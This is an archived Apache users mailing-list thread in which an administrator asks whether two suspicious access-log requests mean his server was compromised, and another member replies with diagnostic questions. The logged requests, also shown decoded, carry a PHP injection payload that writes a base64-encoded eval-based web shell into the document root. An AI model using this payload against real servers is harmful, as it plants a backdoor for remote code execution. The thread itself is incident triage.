httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Daniel <dferra...@gmail.com>
Subject Re: [users@httpd] am i hacked ?
Date Mon, 06 Feb 2017 16:45:47 GMT
Actually now that I re-read the requests it also looks as shellshock
succesful attempt.

Operative system software not updated recently either?

2017-02-06 17:42 GMT+01:00 Daniel <dferradal@gmail.com>:

> Have you tried to send those requests yourself and see what you get?
>
> Still those requests seem to be aimed at your php framework.
>
> Do you use a very old php version as well?
>
> 2017-02-06 17:41 GMT+01:00 Lentes, Bernd <bernd.lentes@helmholtz-
> muenchen.de>:
>
>>
>> ----- On Feb 6, 2017, at 5:14 PM, Bernd Lentes bernd.lentes@helmholtz-
>> muenchen.de wrote:
>>
>> > Hi,
>> >
>> > just in the moment i found two very weird entries in may access_log:
>> >
>> > 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET
>> > /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_
>> time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%
>> 3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
>> > NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27
>> PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
>> > HTTP/1.1" 200 90
>> > 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET
>> > /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_
>> time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%
>> 3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
>> > NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27
>> PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
>> > HTTP/1.1" 200 90
>> >
>> > What upsets me is that these two requests have statuscode 200, which
>> mean it was
>> > successfull.
>> > The IP is from ukraine. Where can i find out what these %charcacters
>> mean ? Does
>> > anyone understand what happened here ? It's apache 2.2.3 64bit.
>> >
>> > Thanks for any hint.
>> >
>> > Bernd
>> >
>>
>> What i find out already:
>> https://url-encoder.de/ helped me to decode the URL:
>> /?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo
>> '->|';file_put_contents($_SERVER['DOCUME
>> NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo
>> '|<-';
>>
>> Currently i don't understand what this means.
>> I don't find a file webconfig.txt.php on my system.
>> Currently no weird process, no new user in /etc/passwd, no packtes to the
>> network which includes this ip.
>>
>> Thankful for any tip.
>>
>>
>> Bernd
>>
>>
>> Helmholtz Zentrum Muenchen
>> Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH)
>> Ingolstaedter Landstr. 1
>> 85764 Neuherberg
>> www.helmholtz-muenchen.de
>> Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe
>> Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons
>> Enhsen
>> Registergericht: Amtsgericht Muenchen HRB 6466
>> USt-IdNr: DE 129521671
>>
>>
>> ---------------------------------------------------------------------
>> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
>> For additional commands, e-mail: users-help@httpd.apache.org
>>
>>
>
>
> --
> *Daniel Ferradal*
> IT Specialist
>
> email         dferradal at gmail.com
> linkedin     es.linkedin.com/in/danielferradal
>



-- 
*Daniel Ferradal*
IT Specialist

email         dferradal at gmail.com
linkedin     es.linkedin.com/in/danielferradal

Mime
View raw message